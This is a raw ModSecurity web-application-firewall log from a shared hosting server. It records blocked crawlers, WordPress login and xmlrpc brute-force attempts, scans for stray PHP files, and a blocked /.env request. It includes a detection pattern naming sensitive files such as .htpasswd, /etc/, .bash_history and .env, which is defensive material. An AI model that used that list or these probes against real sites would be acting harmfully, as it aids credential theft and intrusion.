[Tue May 26 15:51:32.381031 2026] [security2:error] [pid 745492:tid 745704] [client 114.119.148.165:32019] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/2017/01/21/one-more-beer/"] [unique_id "ahV0LImEQglTmoWcfxKB_AAAANQ"], referer: https://koneksi.com.co/2017/01/21/one-more-beer/
[Tue May 26 15:51:33.041832 2026] [security2:error] [pid 747840:tid 747954] [remote 94.76.235.103:49998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV0LIm6MwAuYuZKxvn2NQABcXE"]
[Tue May 26 15:51:33.906172 2026] [security2:error] [pid 747840:tid 748020] [client 172.225.181.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV0LYm6MwAuYuZKxvn2RAAAATw"]
[Tue May 26 15:51:34.032849 2026] [security2:error] [pid 747840:tid 747990] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0LYm6MwAuYuZKxvn2QgAAAR4"]
[Tue May 26 15:51:34.085793 2026] [security2:error] [pid 747840:tid 748027] [client 143.110.243.118:54380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-content/mode.php"] [unique_id "ahV0Lom6MwAuYuZKxvn2TQAAAUM"]
[Tue May 26 15:51:34.654324 2026] [security2:error] [pid 747840:tid 748089] [client 31.57.184.107:52906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-login.php"] [unique_id "ahV0Lom6MwAuYuZKxvn2XQAAAYE"], referer: https://duckduckgo.com/
[Tue May 26 15:51:35.046567 2026] [security2:error] [pid 747840:tid 748017] [client 31.57.184.107:53383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-login.php"] [unique_id "ahV0L4m6MwAuYuZKxvn2awAAATk"]
[Tue May 26 15:51:36.776967 2026] [security2:error] [pid 747840:tid 748056] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0MIm6MwAuYuZKxvn2kQAAAWA"]
[Tue May 26 15:51:36.798651 2026] [security2:error] [pid 747840:tid 748037] [client 103.44.52.196:33932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0MIm6MwAuYuZKxvn2mAAAAU0"]
[Tue May 26 15:51:36.798758 2026] [security2:error] [pid 747840:tid 748037] [client 103.44.52.196:33932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0MIm6MwAuYuZKxvn2mAAAAU0"]
[Tue May 26 15:51:36.912212 2026] [security2:error] [pid 747840:tid 748011] [client 85.208.96.205:18256] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jhonweb.com"] [uri "/robots.txt"] [unique_id "ahV0MIm6MwAuYuZKxvn2nQAAATM"]
[Tue May 26 15:51:36.912342 2026] [security2:error] [pid 747840:tid 748011] [client 85.208.96.205:18256] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonweb.com"] [uri "/robots.txt"] [unique_id "ahV0MIm6MwAuYuZKxvn2nQAAATM"]
[Tue May 26 15:51:38.272946 2026] [security2:error] [pid 745492:tid 745640] [client 103.153.130.62:54076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0MomEQglTmoWcfxKCOgAAAJQ"]
[Tue May 26 15:51:38.273059 2026] [security2:error] [pid 745492:tid 745640] [client 103.153.130.62:54076] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0MomEQglTmoWcfxKCOgAAAJQ"]
[Tue May 26 15:51:38.535750 2026] [security2:error] [pid 747840:tid 748018] [client 185.191.171.10:12386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jhonweb.com"] [uri "/"] [unique_id "ahV0Mom6MwAuYuZKxvn2vgAAATo"]
[Tue May 26 15:51:38.535881 2026] [security2:error] [pid 747840:tid 748018] [client 185.191.171.10:12386] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonweb.com"] [uri "/"] [unique_id "ahV0Mom6MwAuYuZKxvn2vgAAATo"]
[Tue May 26 15:51:38.773125 2026] [security2:error] [pid 745492:tid 745656] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0MomEQglTmoWcfxKCOwAAAKQ"]
[Tue May 26 15:51:39.164486 2026] [autoindex:error] [pid 745492:tid 745648] [client 170.106.84.136:55740] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:51:39.642640 2026] [security2:error] [pid 745492:tid 745587] [remote 45.250.255.226:50124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV0M4mEQglTmoWcfxKCQgABAls"]
[Tue May 26 15:51:40.824263 2026] [security2:error] [pid 745492:tid 745662] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0NImEQglTmoWcfxKCTAAAAKo"]
[Tue May 26 15:51:42.411096 2026] [security2:error] [pid 747840:tid 748010] [client 85.208.96.199:44146] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jhonweb.com"] [uri "/sitemap.xml"] [unique_id "ahV0Nom6MwAuYuZKxvn3AAAAATI"]
[Tue May 26 15:51:42.411234 2026] [security2:error] [pid 747840:tid 748010] [client 85.208.96.199:44146] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonweb.com"] [uri "/sitemap.xml"] [unique_id "ahV0Nom6MwAuYuZKxvn3AAAAATI"]
[Tue May 26 15:51:42.977365 2026] [security2:error] [pid 747840:tid 748028] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Nom6MwAuYuZKxvn3BgAAAUQ"]
[Tue May 26 15:51:45.075703 2026] [security2:error] [pid 745492:tid 745685] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0OImEQglTmoWcfxKCfAAAAME"]
[Tue May 26 15:51:46.880078 2026] [security2:error] [pid 747840:tid 748066] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Oom6MwAuYuZKxvn3WgAAAWo"]
[Tue May 26 15:51:47.230470 2026] [security2:error] [pid 747840:tid 748092] [client 103.44.52.196:38104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0O4m6MwAuYuZKxvn3ZQAAAYQ"]
[Tue May 26 15:51:47.230587 2026] [security2:error] [pid 747840:tid 748092] [client 103.44.52.196:38104] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0O4m6MwAuYuZKxvn3ZQAAAYQ"]
[Tue May 26 15:51:48.847485 2026] [security2:error] [pid 747840:tid 748034] [client 103.153.130.62:54368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0PIm6MwAuYuZKxvn3gAAAAUo"]
[Tue May 26 15:51:48.847601 2026] [security2:error] [pid 747840:tid 748034] [client 103.153.130.62:54368] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0PIm6MwAuYuZKxvn3gAAAAUo"]
[Tue May 26 15:51:49.462175 2026] [security2:error] [pid 747840:tid 748019] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0PYm6MwAuYuZKxvn3ggAAATs"]
[Tue May 26 15:51:50.310998 2026] [security2:error] [pid 747840:tid 748003] [client 74.7.228.8:48946] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.levantefilmes.contabilidadecarioca.com.br"] [uri "/robots.txt"] [unique_id "ahV0Pom6MwAuYuZKxvn3jQAAASs"]
[Tue May 26 15:51:51.533687 2026] [security2:error] [pid 747840:tid 748055] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0P4m6MwAuYuZKxvn3mQAAAV8"]
[Tue May 26 15:51:52.501358 2026] [security2:error] [pid 747840:tid 747986] [client 143.110.243.118:58336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/doc.php"] [unique_id "ahV0QIm6MwAuYuZKxvn3sQAAARo"]
[Tue May 26 15:51:53.416781 2026] [security2:error] [pid 745492:tid 745706] [client 14.226.118.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0QImEQglTmoWcfxKC3QAAANY"]
[Tue May 26 15:51:53.616272 2026] [security2:error] [pid 745492:tid 745623] [remote 91.227.122.219:48434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahV0QYmEQglTmoWcfxKC7QAA5X8"]
[Tue May 26 15:51:54.062443 2026] [security2:error] [pid 747840:tid 748067] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0QYm6MwAuYuZKxvn3uwAAAWs"]
[Tue May 26 15:51:54.418303 2026] [security2:error] [pid 745492:tid 745675] [client 2400:8901::f03c:92ff:fe75:9f55:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV0QYmEQglTmoWcfxKC9AAAtxI"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 15:51:55.751806 2026] [security2:error] [pid 747840:tid 747997] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Q4m6MwAuYuZKxvn32wAAASU"]
[Tue May 26 15:51:57.544928 2026] [security2:error] [pid 745492:tid 745744] [client 143.110.243.118:37070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/indo.php"] [unique_id "ahV0RYmEQglTmoWcfxKDEQAAAPw"]
[Tue May 26 15:51:57.696336 2026] [security2:error] [pid 747840:tid 748056] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0RYm6MwAuYuZKxvn39gAAAWA"]
[Tue May 26 15:51:57.867775 2026] [security2:error] [pid 747840:tid 747984] [client 103.44.52.196:37464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0RYm6MwAuYuZKxvn3_AAAARg"]
[Tue May 26 15:51:57.867895 2026] [security2:error] [pid 747840:tid 747984] [client 103.44.52.196:37464] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0RYm6MwAuYuZKxvn3_AAAARg"]
[Tue May 26 15:51:59.172803 2026] [security2:error] [pid 747840:tid 748069] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Rom6MwAuYuZKxvn4CgAAAW0"]
[Tue May 26 15:51:59.314556 2026] [security2:error] [pid 747840:tid 747994] [client 103.153.130.62:54757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0R4m6MwAuYuZKxvn4EgAAASI"]
[Tue May 26 15:51:59.314684 2026] [security2:error] [pid 747840:tid 747994] [client 103.153.130.62:54757] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0R4m6MwAuYuZKxvn4EgAAASI"]
[Tue May 26 15:52:01.273746 2026] [security2:error] [pid 747840:tid 748053] [client 223.123.35.44:36243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0SYm6MwAuYuZKxvn4MgAAAV0"]
[Tue May 26 15:52:01.273972 2026] [security2:error] [pid 747840:tid 748053] [client 223.123.35.44:36243] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0SYm6MwAuYuZKxvn4MgAAAV0"]
[Tue May 26 15:52:01.363683 2026] [security2:error] [pid 747840:tid 748078] [client 68.183.88.172:48160] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cuatrodoce.com.mx"] [uri "/"] [unique_id "ahV0SYm6MwAuYuZKxvn4PwAAAXY"]
[Tue May 26 15:52:01.435606 2026] [security2:error] [pid 747840:tid 748037] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0SYm6MwAuYuZKxvn4NAAAAU0"]
[Tue May 26 15:52:02.435455 2026] [security2:error] [pid 745492:tid 745628] [client 176.65.139.229:20224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "virgence.com"] [uri "/.env"] [unique_id "ahV0SomEQglTmoWcfxKDPgAAAIg"]
[Tue May 26 15:52:03.935083 2026] [security2:error] [pid 745492:tid 745648] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0S4mEQglTmoWcfxKDRgAAAJw"]
[Tue May 26 15:52:04.472379 2026] [security2:error] [pid 747840:tid 748096] [client 118.174.155.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0TIm6MwAuYuZKxvn4ZQAAAYg"], referer: https://www.anujtradingco.com/
[Tue May 26 15:52:05.679727 2026] [security2:error] [pid 747840:tid 748057] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0TYm6MwAuYuZKxvn4jgAAAWE"]
[Tue May 26 15:52:06.042150 2026] [security2:error] [pid 747840:tid 747994] [client 118.174.155.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0TYm6MwAuYuZKxvn4oAAAASI"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1160196&moderation-hash=8cd1a3e9ca32728f640b0f5972ea02c8
[Tue May 26 15:52:08.063438 2026] [security2:error] [pid 747840:tid 748019] [client 85.208.96.198:52698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow-party/list/"] [unique_id "ahV0UIm6MwAuYuZKxvn42gAAATs"]
[Tue May 26 15:52:08.063564 2026] [security2:error] [pid 747840:tid 748019] [client 85.208.96.198:52698] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow-party/list/"] [unique_id "ahV0UIm6MwAuYuZKxvn42gAAATs"]
[Tue May 26 15:52:08.093605 2026] [security2:error] [pid 747840:tid 748069] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0T4m6MwAuYuZKxvn4yQAAAW0"]
[Tue May 26 15:52:08.154664 2026] [security2:error] [pid 747840:tid 748018] [client 103.44.52.196:41272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0UIm6MwAuYuZKxvn43AAAATo"]
[Tue May 26 15:52:08.154769 2026] [security2:error] [pid 747840:tid 748018] [client 103.44.52.196:41272] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0UIm6MwAuYuZKxvn43AAAATo"]
[Tue May 26 15:52:08.202493 2026] [security2:error] [pid 745492:tid 745709] [client 143.110.243.118:50592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/beence.php"] [unique_id "ahV0UImEQglTmoWcfxKDegAAANk"]
[Tue May 26 15:52:10.066912 2026] [security2:error] [pid 747840:tid 747971] [client 103.153.130.62:55198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0UYm6MwAuYuZKxvn4_AAAAQs"]
